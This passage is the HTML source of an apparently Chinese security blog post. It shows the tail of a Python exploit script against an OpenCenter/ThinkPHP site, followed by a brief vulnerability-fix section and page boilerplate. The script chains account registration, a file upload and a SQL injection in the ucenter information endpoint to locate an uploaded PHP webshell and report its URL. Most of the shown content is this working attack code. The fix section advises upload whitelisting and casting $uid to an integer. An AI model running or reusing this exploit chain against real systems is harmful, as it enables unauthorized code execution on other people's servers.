class="string">&#x27;app=Home&amp;model=File&amp;method=upload&amp;id=&#x27;</span>,</span><br><span class="line">    &#125;</span><br><span class="line">    r = s.post(uploadUrl, data=data, files=file)</span><br><span class="line">    <span class="comment">#print(r.text)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getShell</span>():</span><br><span class="line">    <span class="keyword">global</span> s</span><br><span class="line">    exp = url + <span class="string">&#x27;index.php?s=/ucenter/index/information/uid/23333 union (select 1,2,concat(savepath,savename),4 from ocenter_file where savename like 0x252e706870 order by id desc limit 0,1)#.html&#x27;</span></span><br><span class="line">    r = s.get(exp)</span><br><span class="line">    <span class="comment">#print(r.text)</span></span><br><span class="line">    shellUrl = url + <span class="string">&#x27;Uploads/&#x27;</span> + re.findall(<span class="string">r&#x27;&gt;(.*?)&lt;/attr&gt;&#x27;</span>, r.text)[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">    r = s.get(shellUrl)</span><br><span class="line">    <span class="keyword">return</span> shellUrl <span class="keyword">if</span> r.status_code == <span class="number">200</span> <span class="keyword">else</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    username = register()</span><br><span class="line">    login(username)</span><br><span class="line">    upload()</span><br><span class="line">    shell = getShell()</span><br><span class="line">    <span class="keyword">if</span> shell:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;[*] Getshell! Url is &#x27;</span> + shell)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;[-] Something Wrong...&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    main()</span><br><span class="line">    </span><br></pre></td></tr></table></figure>

<h3 id="0x04漏洞修复"><a href="#0x04漏洞修复" class="headerlink" title="0x04漏洞修复"></a>0x04漏洞修复</h3><ol>
<li>上传：在<code>/ThinkPHP/Library/Think/Upload.class.php</code>的config变量中设置允许上传的文件mime和文件后缀名。</li>
<li>注入：在<code>Application/Ucenter/Controller/IndexController.class.php</code>的information函数中先对$uid进行intval处理，在进行后续操作。</li>
</ol>

        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>
        <div id="lv-container"></div>
        <div class="giscus"></div>
    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <span id="busuanzi_container_site_pv">
            <span id="busuanzi_value_site_pv"></span>PV
        </span>
        <span id="busuanzi_container_site_uv">
            <span id="busuanzi_value_site_uv"></span>UV
        </span>
        Created By <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>  Theme <a target="_blank" rel="noopener" href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = ""
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

<script src="/js/index.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>






</html>
